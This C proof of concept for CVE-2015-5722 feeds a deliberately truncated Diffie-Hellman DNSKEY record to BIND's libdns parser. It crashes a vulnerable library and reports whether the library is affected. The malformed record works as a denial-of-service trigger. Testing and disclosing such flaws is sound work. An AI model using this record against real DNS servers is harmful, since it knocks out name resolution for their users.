/*
 * Proof of concept for CVE-2015-5722 (BIND 9, DNSKEY parsing in
 * openssldh_fromdns).
 *
 * Compile with:
 *
 *     gcc -g -O2 -Wall -I/usr/include/bind9 CVE-2015-5722.c -lisc -ldns
 *
 * The crash is caused by openssldh_fromdns not decrementing the r.length
 * field after it reads the public-key length. The DNSKEY blob below
 * declares a 20-byte public value (publen) but carries no public-key
 * bytes after it, so the parser operates on a region that is already
 * exhausted. Run it against a vulnerable libdns; a library that instead
 * returns an error for this input is not affected by this bug.
 *
 * PRIVATE EXPLOIT -- DO NOT SHARE
 */

#include <isc/mem.h>
#include <isc/buffer.h>
#include <isc/entropy.h>
#include <dst/dst.h>
#include <dns/name.h>
#include <dns/fixedname.h>

#include <err.h>

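/*
 * Build a truncated DNSKEY RDATA record and hand it to dst_key_fromdns().
 *
 * On a vulnerable libdns the call never returns (the library crashes while
 * parsing the public-key field). If it does return, the outcome is reported:
 * a non-success result means the library rejected the truncated key, a
 * success result means it accepted it. Either way the process exits without
 * crashing, which is the "not vulnerable" signal for this PoC.
 *
 * Returns 0 when dst_key_fromdns() succeeds; exits with status 1 via errx()
 * on any library setup failure or when dst_key_fromdns() returns an error.
 */
int
main(void)
{
  /*
   * Minimal libisc/libdns environment required by dst_key_fromdns():
   * a memory context, an entropy context and an initialised DST library.
   */
  isc_mem_t *mctx = NULL;
  if (isc_mem_create(0, 0, &mctx) != ISC_R_SUCCESS) {
    errx(1, "isc_mem_create");
  }

  isc_entropy_t *ectx = NULL;
  if (isc_entropy_create(mctx, &ectx) != ISC_R_SUCCESS) {
    errx(1, "isc_entropy_create");
  }

  if (dst_lib_init(mctx, ectx, 0) != ISC_R_SUCCESS) {
    errx(1, "dst_lib_init");
  }

  /* Owner name attached to the parsed key (absolute, no origin needed). */
  char owner[] = "test.";
  isc_buffer_t b;
  isc_buffer_init(&b, owner, sizeof(owner) - 1);
  isc_buffer_add(&b, sizeof(owner) - 1);

  dns_fixedname_t fname;
  dns_fixedname_init(&fname);
  dns_name_t *name = dns_fixedname_name(&fname);
  if (dns_name_fromtext(name, &b, NULL, 0, NULL) != ISC_R_SUCCESS) {
    errx(1, "dns_name_fromtext");
  }

  /*
   * DNSKEY RDATA: 2-byte flags, 1-byte protocol, 1-byte algorithm, then
   * the algorithm-specific public key. Algorithm 2 selects the DH parser
   * (openssldh_fromdns), whose key is a sequence of length-prefixed
   * fields: prime p, generator g, public value. The last length field
   * announces 20 bytes but the blob ends right after it -- that
   * truncation is the trigger.
   */
  unsigned char blob[] = {
    0, 0, /* flags */
    0, /* protocol */
    2, /* algorithm: DH */

    0, 20, /* plen */
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
    0, 20, /* glen */
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
    0, 20, /* publen */
    /* deliberately missing: the 20 bytes of the public value */
  };
  isc_buffer_init(&b, blob, sizeof(blob));
  isc_buffer_add(&b, sizeof(blob));

  /* Class 1 = IN. A vulnerable library does not return from this call. */
  dst_key_t *key = NULL;
  isc_result_t ret = dst_key_fromdns(name, /* class */ 1, &b, mctx, &key);
  if (ret != ISC_R_SUCCESS) {
    warnx("no crash: the library rejected the truncated key "
          "(target does not appear to be vulnerable)");
    errx(1, "dst_key_fromdns: %s", isc_result_totext(ret));
  }

  warnx("no crash: dst_key_fromdns accepted the truncated key");

  /*
   * Release everything in reverse order of acquisition. The key must be
   * freed before the memory context is destroyed, and dst_lib_destroy()
   * before the entropy/memory contexts it was initialised with.
   */
  dst_key_free(&key);
  dst_lib_destroy();
  isc_entropy_detach(&ectx);
  isc_mem_destroy(&mctx);

  return 0;
}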